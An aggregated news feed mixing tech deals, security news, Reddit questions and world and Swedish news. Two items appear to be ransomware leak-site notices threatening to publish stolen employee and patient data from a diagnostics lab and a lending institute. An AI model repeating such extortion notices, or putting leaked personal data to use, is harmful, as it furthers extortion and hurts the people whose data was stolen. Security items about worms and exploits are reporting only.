Wall Chargers Nano USB-C Wall Charger - $29.99, down from $39.99 140W 4-Port GaN USB-C Charger - $79.99, down from $99.99 Wireless Chargers 3-in-1 MagSafe-Compatible UFO Charger - $69.99, down from $89.99 3-in-1 MagSafe-Compatible Foldable Charging Station - $85.99, down from $109.99 3-in-1 MagSafe-Compatible Charging Cube - $86.99, down from $129.99 3-in-1 Prime Wireless Charging Station - $104.99, down from $149.99 Prime MagSafe-Compatible 3-in-1 Charging Station - $159.99, down from $229.99 Portable Chargers SOLIX C300 Power Station with Lantern - $179.99, down from $249.00 Prime Power Bank 26,250 mAh - $171.48, down from $229.99 SOLIX C1000 Gen 2 Portable Power Station - $449.99, down from $799.00 SOLIX C2000 Gen 2 Portable Power Station - $799.99, down from $1,499.00 If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week. Deals Newsletter Interested in hearing more about the best deals you can find in 2026? Sign up for our Deals Newsletter and we'll keep you updated so you don't miss the biggest deals of the season! Related Roundup: Apple DealsThis article, "Anker's New Prime Charging Station Returns to Low Price on Amazon" first appeared on MacRumors.comDiscuss this article in our forums
Open original transmissionThe woman who was on a virus-hit ship shows "no signs of illness", the government of Pitcairn Islands, a British Overseas Territory, says.
Open original transmissionI manage a bunch of 3D printers in an org that already has PaperCut set up. We need some kind of management software for the 3D printers and I'm wondering if the existing PaperCut setup will do it. It sounds like PaperCut's 3D workflow handles job submission and billing, but a human operator still has to print each file. Which doesn't seem ideal to me. Anyone using PaperCut for this? submitted by /u/Own_Soup4467 [link] [comments]
Open original transmission Gang leader Poya Shafie has been described as one of those closest to Foxtrot leader Rawa Majid. Shafie is suspected of being the mastermind behind several violent crimes in Stockholm and Sundsvall. The trial began on Wednesday.
Open original transmissionA new survey suggests most U.S. smartphone owners are not motivated to upgrade by foldable phone designs or AI features, a potential challenge for Apple as it prepares to launch both the rumored "iPhone Ultra" and an expanded suite of Apple Intelligence features this fall. The survey, commissioned by CNET and conducted by YouGov across 2,407 U.S. smartphone owners between April 29 and May 1, found that only 13% of respondents would consider upgrading for a phone concept such as a foldable or flip phone, while just 12% cited AI integrations as an upgrade motivator. Among iPhone owners specifically, interest in foldable designs was slightly higher at 14%. Apple is widely expected to launch its first foldable iPhone alongside the iPhone 18 Pro this fall, with a starting price of around $2,000. While a 13% interest statistic in foldable designs has been characterized as evidence of limited appeal, it may actually represent a larger addressable market than anticipated for a product most consumers have never used and whose likely price was not disclosed to respondents. Interest could shrink considerably once a $2,000-plus price tag enters the picture, and supply chain reports suggest smooth availability may not occur until 2027. Consumer sentiment around AI integrations dropped sharply from 2024 to 2025 before edging slightly higher in 2026, though the figure remains low at 12%. Previous surveys found that the majority of iPhone users felt existing Apple Intelligence features added little to no value to their experience. Price remains the overwhelming driver of upgrade decisions, cited by 55% of respondents, followed by longer battery life at 52%, and more storage at 38%. Those top three motivators are unchanged from 2025, when price led at 62%, battery life at 54%, and storage at 39%. Camera features (27%) and display size (22%) ranked well ahead of either foldables or AI as upgrade motivators. 
Smartphone owners are also not particularly swayed by a phone being thinner or available in new colors, findings that are relevant given Apple's recent emphasis on the ultra-thin iPhone Air and expanded color options across its lineup. This article, "Few Smartphone Owners Care About Foldables or AI, Survey Suggests" first appeared on MacRumors.com.
Open original transmissionA cyber security expert says deleting chat history could lead to a lack of accountability if things go wrong.
Open original transmissionThe BBC's Sarah Smith explains the power dynamic between the two world leaders as they meet in Beijing.
Open original transmissionA survey compiled from fintech firm Ramp’s clients’ expense data shows 34.4% of participating businesses are paying for Anthropic services, more than any other AI lab, while only 32.3% pay for OpenAI.
Open original transmissionFrom October 13-15, TechCrunch Disrupt 2026 will feature 200+ sessions across six stages, led by 250+ tech leaders shaping the industry today. Register now to save up to $410, plus 50% off a second pass.
Open original transmissionMeta said these incognito conversations are not saved, and messages will disappear by default once you close the chat.
Open original transmissionGoogle announced its new Googlebook laptop platform yesterday, and so far I've been left asking, "Why?" Why is Google blowing up its Chromebook and ChromeOS platform for this? I've been excited by the prospect of Android and ChromeOS unifying under the long-rumored Aluminium OS. The theory was that Aluminium might unite Android and ChromeOS under […]
Open original transmissionNo one paid attention to the gunshots that echoed through the convention center. They were real enough, and so were the screams that accompanied them, in the sense that they were recordings of real people who, like guest stars on Law and Order, reenacted scenarios that had clearly been plucked from the headlines: a kidnapping, […]
Open original transmission At Rapid7, our commitment to our partners is built on the foundation of the PACT (Partnering with Accountability, Consistency, and Transparency) program. Central to this mission is the Rapid7 Partner Academy, which was recently honored with a Gold Stevie Award in the 2026 American Business Awards® for Achievement in Collaboration and Partnership. This recognition underscores our dedication to providing world-class training that translates directly into partner success and customer resilience.

A new era of partner-led services

To meet the evolving needs of the cybersecurity landscape, Rapid7 Partner Academy has introduced specialized Partner Services Certifications. These role-based learning paths are designed to move beyond traditional "product training" by focusing on high-fidelity service delivery and outcome-driven results, including how to build, deliver, and scale services on Rapid7 solutions. The training and certification program was specifically recognized for its "Partner-First" design, which was built through extensive collaboration with our global partner ecosystem to ensure alignment with real-world sales and technical challenges.

Our award-winning partner services certification ecosystem focuses on three critical pillars of the Rapid7 Command Platform:

- Partner Services for InsightIDR: Equips partners with the skills and knowledge necessary to effectively guide customers through the post-sale phases of the InsightIDR solution.
- Partner Services for Exposure Command: Focuses on the transition from static vulnerability scanning to continuous attack surface validation, diving into the setup, management, and troubleshooting of Exposure Command.
- Partner Services for Vulnerability Management: Empowers partners to provide impactful services around deployment, management, and ongoing support for InsightVM that drive customer success.

All three of these Partner Services Certifications enable our partners to deliver services around Rapid7 solutions from deployment and onboarding, to management and best practices for usage, to express health checks and troubleshooting. Upon successful completion of the course theoretical exam, you are eligible to enroll in the Services Validation Component. After validating your services capabilities, you will receive the prestigious distinction of achieving the Rapid7 Partner Services Certification and Badge. This achievement helps to differentiate your services to your customers and prospects with official recognition among the most capable Rapid7 MSSPs and service delivery partners.

Real-world impact: From training to execution

The Gold Stevie Award recognizes more than just curriculum—it recognizes the impact these certifications have on the partner's ability to drive business and accelerate their profitability with Rapid7. By completing these Rapid7 Partner Academy certifications, partners gain:

- Operational excellence: Technical specialists learn to deploy and manage Rapid7 solutions with a "Gold Standard" approach, ensuring high-fidelity results for customers.
- Strategic alignment: Sales professionals are trained in the RSP (Rapid7 Sales Professional) methodology, allowing them to position Rapid7 as the preferred solution through effective discovery and objection handling.
- Program economics: Certified partners can take full advantage of the 2026 PACT updates, which offer enhanced incentives and streamlined deal motions for partner-led growth.

Collaborating for success

The Stevie Award for Achievement in Collaboration and Partnership specifically applauds how Rapid7 integrated partner feedback into the curriculum development. This wasn't just Rapid7 talking to partners; it was a co-innovation effort. By coordinating with partners and Rapid7 technical support stakeholders, we ensured that the Partner Academy content directly addresses the "last-mile" technical blockers partners face in the field.

The value and impact of Partner Academy is highlighted by the comments from the Stevie American Business Awards® judges:

"I've seen a lot of partner programs, and most are built for the vendor, not the partner. This one stands out... A 5X outperformance, 76% completion rate, 91% satisfaction, and an NPS of 68 all point to real value delivered, not vanity metrics. I'm especially impressed by the coordination behind it – 100 contributors across 13 business units. That level of alignment is hard to achieve, and it shows strong leadership. The fact that the program was mentioned on an earnings call also signals clear strategic impact."

"Overall, this is an outstanding and result-oriented program, and it sets the bar high for the partner enablement process. Exceeding the certification target by 5X within a significantly shortened timeframe speaks volumes for the relevance and execution of the program, and the creation of role-based, technically sophisticated learning paths speaks volumes for the focus on partner enablement."

Celebrating our partners

This award is a shared victory with the thousands of partner individuals who have invested in their professional development through the Partner Academy. Whether you are a technical expert seeking to "Command the Attack Surface" or a sales professional looking to protect your margins, the Partner Academy is your gateway to success in the Rapid7 ecosystem.

Join the award-winning program and start your learning journey today!

As we continue to innovate, our goal remains the same: to provide the most transparent, consistent, and world-class enablement program in the industry. We invite all partners to officially become a Rapid7 PACT Partner to explore these award-winning certifications and start driving deeper impact for your customers today.
Open original transmissionArticle URL: https://avkcode.github.io/blog/us-winning-ai-race.html Comments URL: https://news.ycombinator.com/item?id=48121929 Points: 64 # Comments: 172
Open original transmission Allele Diagnostics specializes in providing exceptional microarray and cytogenetic testing services, including neonatal, pediatric, and prenatal testing. The company is dedicated to delivering accurate, fast, and reliable results, leveraging the extensive experience of its laboratory staff to optimize testing performance. We will upload corporate data soon. Detailed employee personal information (passports, DLs, SSNs, I9 forms, credit card details and so on), patients information (personal docs and medical information), contracts and agreements, etc.
Open original transmissionSouthampton will play Hull in the Championship play-off final. Or will they? As Spygate moves towards its conclusion, Middlesbrough could yet head to Wembley.
Open original transmissionBittersweet post tells devs what they already knew: The framework is too slow
Open original transmissionA newly disclosed Linux kernel vulnerability dubbed Fragnesia allows any local unprivileged user to escalate privileges to root without requiring a race condition, making it one of the more reliable local privilege escalation exploits seen in recent years. Discovered by William Bowling of the V12 security team, Fragnesia joins a growing class of dangerous kernel […] The post Fragnesia Linux Vulnerability Let Attackers Gain Root Privileges – PoC Released appeared first on Cyber Security News.
Open original transmissionRoza was among several victims who gave testimony to Democratic lawmakers on Tuesday.
Open original transmissionMicrosoft has unveiled a new multi-model artificial intelligence (AI)-driven system called MDASH to facilitate vulnerability discovery and remediation at scale, adding that it's being tested by some customers as part of a limited private preview. MDASH, short for multi-model agentic scanning harness, is designed as a model-agnostic system that uses bespoke AI agents for different vulnerability
Open original transmissionGCC 16.1 released at the end of April as the latest major, annual feature release to the GNU Compiler Collection. Early benchmarks showed some nice leads for GCC 16 over GCC 15. Continued testing of the new GCC 16 compiler has continued to show overall better performance of the resulting binaries than using GCC 15 on the same hardware and same compiler flags. That led many to wonder about the GCC 16 performance up against the latest LLVM/Clang open-source compiler, which is the focus of today's benchmarking showdown.
Open original transmission Following the proposal to lower the fuel tax, the government is facing criticism from the opposition. "It is incomprehensible in this situation; I would say it is sheer madness to lower fuel taxes in an oil crisis and when we are stuck in oil dependency," says Green Party spokesperson Daniel Helldén. "Once again they seem to have totally underestimated the consequences for the Swedish economy," says Mikael Damberg (S).
A BBC investigation exposed how scammers posted social content of dogs in distress to dupe donors into giving money.
While something new is always around the corner, now might be a particularly good time to hold off on buying a new iPhone if you are able to. The reason to consider waiting is that Apple is reportedly working on a special 20th-anniversary iPhone for release in September 2027, and rumors suggest that the device will feature the biggest redesign since the iPhone X in 2017. According to Bloomberg, the 20th-anniversary iPhone will have "glass edges that curve seamlessly into the display on all four sides." The Information reported that one of Apple's early 20th-anniversary iPhone prototypes lacked bezels around the screen. The device had only a "narrow metal band running around the midpoint of the device's edge, where the buttons sit." Apple has also aimed for the device to have no cutouts in the screen, according to The Information, but it is unclear if the company will be able to move both the front camera and the Face ID system under the screen by next year. Overall, it sounds like Apple has ambitious goals with the 20th-anniversary iPhone, and that makes it a device that might be especially worth waiting for. Of course, this advice will not apply to you if you upgrade your iPhone every single year regardless, but the average customer holds on to their iPhone for two to four years. In the meantime, Apple is expected to release the iPhone 18 Pro, iPhone 18 Pro Max, and its first-ever foldable iPhone in September 2026, followed by an iPhone 18, iPhone 18e, and a second-generation iPhone Air around March 2027. This article, "You Might Want to Wait to Buy a New iPhone" first appeared on MacRumors.com.
This webinar will help OT security teams and asset owners stop being cost centers and start being resilience drivers. The post Webinar Today: ROI for Cyber-Physical Security Programs appeared first on SecurityWeek.
Want to watch the football World Cup with others? Screenings of the matches on big screens are planned in several places in Stockholm County, both in urban settings and at restaurants and bars. Here is the guide to where you can watch the matches this summer.
May 19 launch will put redesigned rocket, pad, and engines through their paces
Poppy is an AI-powered app that connects your calendar, email, messages, and other services to surface reminders, suggestions, and tasks based on what’s happening in your life.
With the Switch 2 getting a price hike in September, this holiday season will be pivotal for Nintendo. That increased cost means that the company will rely heavily on new games to sell its current console - but as of right now the lineup for the second half of the year is sparse. However, without […]
US Defence Secretary Pete Hegseth’s rare presence in President Donald Trump’s entourage to Beijing signals a willingness on both sides to strengthen military communications to de-escalate and avoid crises, and suggests US arms sales to Taiwan will feature in talks, analysts say. The Chinese experts expected Beijing to include Defence Minister Dong Jun in talks during the summit, with one source suggesting that Dong and Hegseth might also hold separate negotiations on the sidelines of the...
At Sapphire 2026, SAP presented what it calls the "Autonomous Enterprise": a sweeping vision in which AI agents not only assist employees but carry out business processes themselves. "We are building nothing less than a new SAP," CEO Christian Klein told attendees in Orlando, Florida. The company, he said, is on its way to "becoming a business AI company". At the core is SAP Autonomous Suite, which uses more than 50 domain-specific SAP Joule AI assistants across finance, supply chain, procurement, HR and customer engagement. These assistants coordinate a group of more than 200 specialized agents to carry out tasks end to end, from compressing the financial close to automating supply chain rebalancing. Klein stressed that enterprise AI requires precision. "If AI handles payroll, the financial close or supply chain planning, 80 percent accuracy is not enough," he said. A new platform and a new interface: The foundation of the suite is SAP's new Business AI Platform, which unites SAP's Business Technology Platform, Business Data Cloud and AI capabilities in a single governed environment. At its core is what SAP calls "enterprise memory", a context graph that supplies the agents with policies, procedures, Slack conversations and email approval chains so that they know what to do and, above all, what not to do. "When an exception occurs, it is added to the enterprise memory and all agents adapt immediately," said Muhammad Alam, the executive board member responsible for product development. SAP also introduced Joule Work, which fundamentally changes how users interact with SAP software. Instead of navigating applications and entering data on various screens, users describe a desired outcome, and Joule coordinates workflows, data and agents to get it done.
For developers, SAP launched Joule Studio 2.0, available free of charge until the end of the year, which lets them build agents with Python, Claude Code or Cursor and deploy them to a managed runtime. AI Agent Hub, which launches in the third quarter at no extra cost, offers a single place to discover, manage and govern agents across both SAP and non-SAP systems. Partners and proof: SAP invited key partners on stage and on screen to underline its AI ambitions. In video clips, Anthropic president Daniela Amodei said that Claude models power Joule agents in finance, procurement and supply chain, and Nvidia CEO Jensen Huang discussed open agent protocols that enable AI to act securely within enterprises. Jeremy Barnum, CFO of JP Morgan Chase, said the bank is upgrading its general ledger to SAP's unified platform and exploring agent capabilities for cash management. "You cannot realize the full potential of AI in a legacy environment," he said. A number of customers have already put the system into production. According to Rob Fisher, KPMG's global head of advisory, the firm has, for example, deployed Joule for 270,000 users, with 3,000 consultants using 20 agents, and aims to reduce contract leakage by 120 million dollars. In addition, Ericsson reported saving 90,000 hours by using personalized AI recommendations for its 85,000 employees. Bayer uses assistants for cash collection; Novartis has deployed procurement agents for large volumes; and H&M has demonstrated a store information system that delivers real-time performance data and AI-driven recommendations to store managers. Mind the gap: Yet adoption lags behind the ambitions. Maribel Lopez, founder of Lopez Research, says companies are not implementing what is already available. "SAP customers are very cautious because SAP workloads are central to running the business," she says.
Mickey North Rizza, head of enterprise software at analyst firm IDC, is more optimistic. "Currently, 73 percent of AI agents and assistants are used frequently and deliver savings of 30 to 90 minutes per day," she says. "SAP's AI vision is a guiding star for its customers to successfully enter the AI world." SAP's Alam added that customers have grown impatient with the company's AI promises and have held him to account. Referring to the financial close assistant, one customer demanded: "Does it really exist? If it takes three months, I'll build it myself." That creates a new sense of urgency, Alam said. Trust, but verify: SAP has made governance a central focus, Alam noted. The company has built SOX auditor compatibility into its framework to ensure audit readiness at the agent level, and every action is logged and traceable. But Jonathan von Rüeden, SAP's head of AI, acknowledged that customers have varying levels of comfort with autonomy, depending on the process. "In a financial close process, the CFO will want to take a look when the books are closed. But people feel more comfortable with autonomous accruals." SAP is also prioritizing interoperability. Agents built in Joule Studio will support the A2A protocol for connecting to third-party agents, and SAP's orchestration layer will govern non-SAP agents at no extra cost. The road to autonomy: To speed up adoption, SAP has updated its offerings. RISE with SAP customers get three Joule assistants activated during their first year, while GROW with SAP customers get access to the full agent portfolio at onboarding. Agent-led transformation tools can reduce migration effort by about 35 percent, according to SAP. "But right now customers don't need thousands of agents; they need to get agentic AI up and running with a set of secure, governed agents that help them handle specific use cases," says Lopez.
"Customers need to ask themselves what the vision is, connect it to their needs and then plan the journey."
The notorious malware group TeamPCP appears to have published the source code for its Shai-Hulud worm openly on GitHub, The Register reports. Security firm Ox discovered two public code repositories where the group itself describes the project as open source. Shai-Hulud is a self-propagating worm that targets NPM packages and attempts to steal credentials for services such as AWS, GitHub, Azure and Google Cloud. If it succeeds, it can automatically infect more projects by publishing tampered packages onward in developers' supply chains. In some cases, the malware also attempts to wipe the local environment if the attack fails. According to Ox, other attackers have already begun forking and modifying the code on GitHub for their own versions of the worm. At the time of reporting, the repositories had been available for twelve hours without GitHub removing them.
The Institute of Private Enterprise Development focuses on improving the livelihoods of micro and small entrepreneurs by offering loans ranging from $40,000 to $7,500,000 GYD. Their services are designed to support individuals looking to start or grow their businesses, with a significant emphasis on female and youth entrepreneurs, as well as those in rural areas. We will upload 55gb of corporate data soon. Detailed clients and employee personal information (passports, DLs, SSNs, ID cards, financial information, credit card details and so on), NDAs, etc.
Several major Hollywood names, such as George Clooney, Tom Hanks and Meryl Streep, are backing the new AI standard "Human Consent Standard", The Verge reports. Also behind the initiative are organizations such as Creative Artists Agency and the actress Cate Blanchett, who describes the system as a way for both celebrities and ordinary people to protect their rights in the AI era. The standard allows users to specify whether AI companies may use their material freely, only under certain conditions, or not at all. The aim is to give people greater control over how AI systems may use their faces, voices, characters and creative works. The system builds on the "Really Simple Licensing" standard and uses signals via robots.txt files to communicate the rules to AI bots. In June, a registry will also launch that AI systems can check and where both creators and private individuals will be able to verify their identity and state their AI terms.
South Korea's government is considering a kind of "citizens' dividend" in which parts of the enormous profits from the country's semiconductor and AI industry could be redistributed to the public, Nikkei Asia reports. The proposal comes from President Lee Jae Myung's policy chief, Kim Yong-beom, who warns that the AI economy risks creating large divides. According to him, AI and chip companies will accumulate very large profits while the middle class and people without AI skills risk falling behind. The government has not yet presented exactly how such a dividend would work in practice. One variant is that part of the profits would be used for initiatives such as support for young entrepreneurs, rural areas, artists, pensioners and AI education. According to Kim Yong-beom, South Korea now faces a choice: to continue as a traditional export-dependent economy that swings with the global business cycle, or to develop into a new kind of AI-driven industrial state.
We’re seeing a lot of alerts getting triggered by normal application behavior that looks suspicious in isolation but isn’t actually an incident. Here is an ex. pattern we keep running into: A service logs repeated warnings like: “request retrying due to upstream delay”. This gets picked up by an alert rule that matches on retry + error pattern, even though in this case it’s expected behavior during brief latency spikes. What ends up happening is the same rule catches both real incidents (service failures) and normal transient conditions, depending on timing and context. What I’ve tried: tightening regex patterns, but this starts missing real failures that look similar; increasing thresholds (for ex. number of occurrences), but that delays detection too much; splitting alerts per service, but noise still appears at service boundaries; adding exclusions for known patterns, but this becomes hard to maintain over time. I’m aware we could disable or heavily narrow rules, but that feels like trading false positives for blind spots rather than solving the issue. What I haven’t figured out yet is whether there’s a common approach for adding context to log based alerting. Right now each log line is evaluated independently, but most of the false positives seem to come from not considering surrounding events or sequences. Is there a standard way teams reduce false positives in log alerting without relying purely on stricter regex or threshold tuning? Any advice is appreciated, thanks! submitted by /u/Iwanttoberich_8671
The European Union will not ban “conversion therapy” targeting LGBTQ people, but will push member states to take action against such practices, it said on Wednesday. So-called conversion “therapies” involve methods that seek to change the sexual orientation or gender identity or expression of members of gay, lesbian, queer and trans people. The EU stopped short of heeding a call by over a million people, who signed a petition last May calling on the 27-country bloc to prohibit such...
Vänersborg District Court sentences a 68-year-old man to three years in prison after a woman in her mid-40s was found dead in Vänersborg Municipality.
Several shots were fired and chaos broke out at the Philippine Senate in Manila on Wednesday. This happened as Senator Ronald dela Rosa, who is wanted by the International Criminal Court, was about to be arrested.
Cinematographer Hillary Fyfe Spera on how she kept things visually fresh for Born Again’s second season.
Letter to the editor: Long-term thinking strengthens Alingsås's attractiveness (Alingsås Tidning)
Chinese experts on the US do not expect major breakthroughs ahead of US President Donald Trump's visit to Beijing. The goal for both sides is to keep the relationship calm, they say. But they differ on how strong China's negotiating position is. China will not succeed in obtaining any significant or long-term advantages from the US in either the economy or technology, judges Shi Yinhong, professor of international relations at Renmin University in Beijing. Wang Yue Sheng, professor of economics at Peking University, says on the contrary that Beijing has the stronger hand when negotiations begin.
Public concern has only grown, says ICB, while evidence of benefits remains thin
Roe deer on the wrong side of the wildlife fence on the E20 (Alingsås Tidning)
He called himself Jennifer and posed as a 16-year-old girl. Just over two years ago he was sentenced to six years in prison for crimes against nine children. Now he is being convicted in Jönköping District Court of similar crimes against a further 44 children.
Shots have been fired in the Philippine Senate building in Manila, where former police chief Ronald de la Rosa has sought refuge from the threat of arrest and extradition to the ICC in The Hague. De la Rosa is suspected of crimes against humanity during former president Rodrigo Duterte's anti-drug campaign, in which he is accused of at least 32 deaths, while human rights groups speak of thousands killed. In a video clip, the shots can be heard as journalists flee in panic and the Senate president says the building is under attack.
Trump has landed in Beijing for the first visit by a US leader since his own in 2017.
A threat actor with affiliations to China has been linked to a "multi-wave intrusion" targeting an unnamed Azerbaijani oil and gas company between late December 2025 and late February 2026, marking an expansion of its targeting. The activity has been attributed by Bitdefender with moderate-to-high confidence to a hacking group known as FamousSparrow (aka UAT-9244), which shares some level of
In the latest evolution of automated cyberattacks, two threat campaigns heavily leveraged AI agents to support attacks against entities in Mexico and Brazil.
The cyberthreat group targets an Azerbaijani oil and gas firm with repeated attacks, as the China-linked actors extend targeting beyond hospitality, telecom, and government sectors.
Cloud-powered undo will roll back dodgy code without users or hardware partners lifting a finger
Hi All, In all my years, this is something I’ve never hit up against so looking for some general guidance. Recently migrated a website to new hosting provider. Since doing so, access to the website from China is not working. Hosting provider confirmed no geo blocking in place. Can ping and tracert to the website IP address from China IPs, but unable to access the site over HTTPS. Colleagues in China suggest it must be the China government firewall, which it certainly seems to be. Guess we were lucky that the previous hosting IP wasn’t blocked. What approaches are available to address this? They’ve suggested reverse proxy in Hong Kong, but not sure of the technical (or legal) implications of something like that. Thanks! submitted by /u/greenstarthree
A Hong Kong court has remanded a former university professor in custody pending sentencing for accepting a HK$40,000 (US$5,109) bribe and offering red packets to two colleagues to help a student gain admission to a postgraduate programme last year. Kwun Tong Court heard on Wednesday that Liu Hongbin, 63, abused his authority as chair professor of the ocean science department at the Hong Kong University of Science and Technology (HKUST) to help a mainland Chinese student majoring in automotive...
Gorey Community School is a co-educational, multi-denominational institution located in Gorey, Co. Wexford, under the joint patronage of the Loreto Sisters and Waterford and Wexford ETB
These websites represent a synergistic group of Malaysian companies, such as AME Elite and TSK Synergy, specializing in integrated industrial construction and engineering solutions. They provide end-to-end services, including the design and fabrication of steel structures, mechanical engineering, and the development of large-scale industrial parks. Together, they leverage their combined expertise to deliver "turnkey" manufacturing facilities and infrastructure projects across the region.
Article URL: https://jorijn.com/en/blog/leaving-github-for-forgejo/ Comments URL: https://news.ycombinator.com/item?id=48121266 Points: 411 # Comments: 221
Roe deer on the road can create danger on the E20 (Alingsås Tidning)
Foxconn, the world's largest electronics manufacturer, says some of its North American factories are now working to resume normal operations after a cyberattack. [...]
French authorities on Wednesday confined more than 1,700 passengers and crew on a British cruise ship docked in Bordeaux after an elderly passenger died, said officials, who played down any links to the hantavirus scare. Dozens also suffered from upset stomachs aboard the Ambition – most of whose 1,233 passengers are from Britain or Ireland – which arrived in the western port of Bordeaux on Tuesday, with 514 Indian crew members also on board. But health officials said there was no connection...
The Rivian Assistant is available for both Gen1 and Gen2 hardware.
The watchdog says it is opening a case into The Anti-Slavery Collective to assess concerns over spending.
Lower tax on petrol and diesel. That is part of the crisis package the government presented on Wednesday. A positive step, according to Katarina Wolf, chair of LRF Ungdomen and a farmer outside Rimforsa. But she stresses that more is needed to handle recurring crises.
Attackers can compromise systems in minutes while patching and response still take hours or days. Picus Security breaks down why autonomous validation is becoming critical for modern defense strategies. [...]
Summer hit South Asia early this year. April saw above average temperatures and the mercury is expected to reach unbearable highs this month. We are also bracing for a “super El Nino”, where a combination of increased heatwaves and highly variable weather patterns are expected to push urban zones, agricultural systems and public health to their limits. South Asia, especially parts of Pakistan, India and Nepal, is likely to receive below average monsoon rainfall during the summer months of...
A man in his 60s has been remanded in custody on suspicion of a murder in a house in Hällby outside Eskilstuna in the early hours of Sunday.
Gunshots broke out at the Philippine Senate on Wednesday and people ran for cover after a top politician wanted by the International Criminal Court said his arrest was imminent and security forces entered the building. There were no immediate reports of casualties, however, Senate Secretary Mark Llandro Mendoza told reporters following the chaos at the legislature in the capital Manila. Senator Ronald dela Rosa, a former police chief who was the main enforcer of former Philippine president...
Production of estrogen medicines is too slow to meet the growing demand among women with menopausal symptoms. Shelves now stand empty in many places in Sweden. "I get tired, furious and sad," says Anna Sahlin, whose brain fatigue and lack of sleep have been eased thanks to the estrogen supplements.
Croydon trial helped secure 173 arrests, though civil liberties groups remain unconvinced
New films by the Spanish veteran filmmaker Pedro Almodóvar, Polish "Ida" director Paweł Pawlikowski and Iran's Asghar Farhadi. Get a handle on who has a chance of winning the film world's most prestigious prize: the Palme d'Or.
The Committee on Homeland Security has requested to be briefed on the incident and Instructure’s remediation steps. The post Government to Scrutinize Instructure Over Canvas Disruption, Data Breach appeared first on SecurityWeek.
Adaption's new AutoScientist tool is designed to let models adapt to specific capabilities quickly through an automated approach to conventional fine-tuning.
Newly started independent schools will be barred from taking out profits during their first five years, according to a proposal from the government and the Sweden Democrats. The Tidö parties call it a ban on value transfers. A ban on profit distribution will also apply for three years after a change in ownership structure and for two years if the school has quality deficiencies. An independent school that breaches the ban can be forced to pay a fine. Today's proposal does not amount to a total ban on profits for independent schools.
Asian migrant workers in the Gulf are testing stablecoins as a backup channel for sending money home, as the Iran war heightens fears that the risk of US sanctions could disrupt remittances that millions of families and several Asian economies rely on. Remittances from these workers account for 3 per cent to 5 per cent of gross domestic product in several emerging markets – in Nepal, it is as high as 10 per cent, according to data from the Global Settlement Network. Concerns over remittance...
There may be problems for those heading out on the railways over Ascension Day, as the Swedish Transport Administration (Trafikverket) is closing several stretches for works. "They will be working around the clock," says Felicia Danielsson, press officer at Trafikverket. SJ has rerouted southbound journeys from Södertälje via Västerås and Örebro, says press spokesperson Anders Edgren.
Article URL: https://www.ycombinator.com/companies/substrate/jobs/T2fMBhD-technical-success-manager Comments URL: https://news.ycombinator.com/item?id=48120776 Points: 0 # Comments: 0
The Dutch government has objected to a proposed US law that would further restrict semiconductor equipment giant ASML from selling to China and servicing customers in the country. The Dutch company, the global market leader in the lithographic technology used to laser-print tiny circuits onto microchips, has seen its access to the Chinese market severely hampered by US sanctions. Now, as US lawmakers look to further choke the European outfit off from the Chinese market, The Hague has lodged an...
Nearly 1,000 climbers will attempt to scale the peak in coming weeks and this has raised safety concerns.
Microsoft says some customers are experiencing issues downloading and installing Office on their Windows 365 devices. [...]
Keir Starmer faced his biggest challenge yet on Wednesday when his health minister was reported to be readying his resignation to try to trigger a contest to replace a British prime minister who had sought some respite to set out his government’s agenda. As Starmer and his ministers stood in silence to hear King Charles read out their government’s agenda, the ceremony was overshadowed by what could be the most dangerous threat to the prime minister since lawmakers began urging him to resign over...
TL;DR: Stop chasing thousands of "toast" alerts. Join experts from Wiz to learn how hackers connect tiny flaws to build a "Lethal Chain" to your data—and how to break it. Register for the Strategic Briefing Here. Most security tools work like a smoke alarm that goes off every time you burn a piece of toast. You get so many alerts that you eventually start to ignore them. The real danger? While
Donald Trump has landed in China for meetings with his counterpart Xi Jinping. It is the first time a US president has visited the country in almost a decade. "Large parts of Beijing are prepared for Trump's entry into the city. He will travel from the airport to a hotel in the northeastern part of Beijing," says Stefan Åsberg, SVT's Asia correspondent on the scene.
The authority managing Hong Kong International Airport has taken over the retail operations of 11 Skies from New World Development ahead of the opening of Terminal 2, the South China Morning Post has learned. Multiple sources said the Airport Authority had assumed control of key components of the 2.66 million sq ft retail and dining space, representing 70 per cent of the entire project. But it remains unclear whether the authority has also taken over the rest of 570,000 sq ft of experiential...
Displaced teenagers Farah and Tala wanted to 'turn destruction into something useful'.
Article URL: https://monokai.com/articles/how-i-moved-my-digital-stack-to-europe/ Comments URL: https://news.ycombinator.com/item?id=48120629 Points: 695 # Comments: 461
The government is presenting a crisis package of SEK 17.5 billion because of the global energy crisis. Among other things, it proposes lower tax on petrol and diesel from 1 July. Ekot's political commentator Fredrik Furtenbach: "One idea behind this is to prop up the economy."
US President Donald Trump has arrived at Beijing Capital International Airport for talks with Chinese President Xi Jinping. The state visit is the first by an American president in almost nine years. It...
Security teams have never had better visibility into their environments and never been worse at confirming what they fix stays fixed. Mandiant's M-Trends 2026 report puts the mean time to exploit at an estimated negative seven days. The Verizon 2025 DBIR puts median time to remediate edge device vulnerabilities at 32 days. These numbers have understandably driven the industry toward a clear
Further demonstrating its role as industry default OS the versatility of modern porting tools
A court in Bremen has found the manufacturer of the classic Alpine Milk chocolate bar guilty of "shrinkflation".
Bitlocker bypass anyone? GitHub - Nightmare-Eclipse/YellowKey: YellowKey Bitlocker Bypass Vulnerability · GitHub submitted by /u/MegaN00BMan
Two former prison guards discuss the long-term trauma of a career working with Northern Ireland's most dangerous criminals.
The government and the Sweden Democrats want to introduce a profit freeze for new schools, schools with new owners and schools found to have quality deficiencies. Under the proposal, it will also become easier to close independent schools when serious misconduct is discovered. "More than 30 years of unregulated profit withdrawals are now coming to an end. The money is to stay in the operations," says Education Minister Simona Mohamsson (L) at a press conference.
The telehealth platform was hacked in January, and users’ personal information was exfiltrated from its systems. The post 716,000 Impacted by OpenLoop Health Data Breach appeared first on SecurityWeek.
Police suspect that a theft ring is operating in Jämtland and Härjedalen. Several quad bike thefts have been reported in a short time, in Offerdal, Bruksvallarna and Mittådalen. The same model of quad bike has disappeared at two of the locations.
Around 1,700 people are stuck on a cruise ship in the port of Bordeaux, France, after norovirus, which causes winter vomiting disease, was detected on board.
Rain, wind and cold temperatures are expected over the long weekend. In southern Norrland and parts of Svealand, up to 20-30 millimetres of precipitation may fall. "Next week it looks like the slightly warmer air will make a return to Sweden," says Fanny Saarela, meteorologist at SMHI.
